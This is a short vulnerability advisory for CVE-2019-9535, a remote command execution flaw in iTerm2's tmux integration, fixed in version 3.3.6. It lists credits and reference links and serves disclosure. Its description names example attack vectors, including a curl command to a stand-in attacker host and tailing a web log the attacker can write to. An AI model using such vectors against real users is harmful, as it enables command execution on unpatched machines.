Allele Security Alert
ASA-2019-00556
Identifier(s)
ASA-2019-00556, CVE-2019-9535
Title
Remote command execution via output to the terminal
Vendor(s)
George Nachman
Product(s)
iTerm2
Affected version(s)
iTerm2 versions before 3.3.6
Fixed version(s)
iTerm2 version 3.3.6
Proof of concept
Yes
Description
During the audit, Radically Open Security identified a critical vulnerability in the tmux integration feature of iTerm2. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.
Technical details
Unknown
Credits
Stefan Grönke and Fabian Freyer (Radically Open Security)
Reference(s)
Important security update — please upgrade!
https://groups.google.com/forum/m/#!topic/iterm2-discuss/57k_AuLdQa4
Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit
https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/
Do not send server-controlled values in tmux integration mode.
https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2b5724f820953d717fbeb0c
CVE-2019-9535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9535
CVE-2019-9535
https://nvd.nist.gov/vuln/detail/CVE-2019-9535
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: October 9, 2019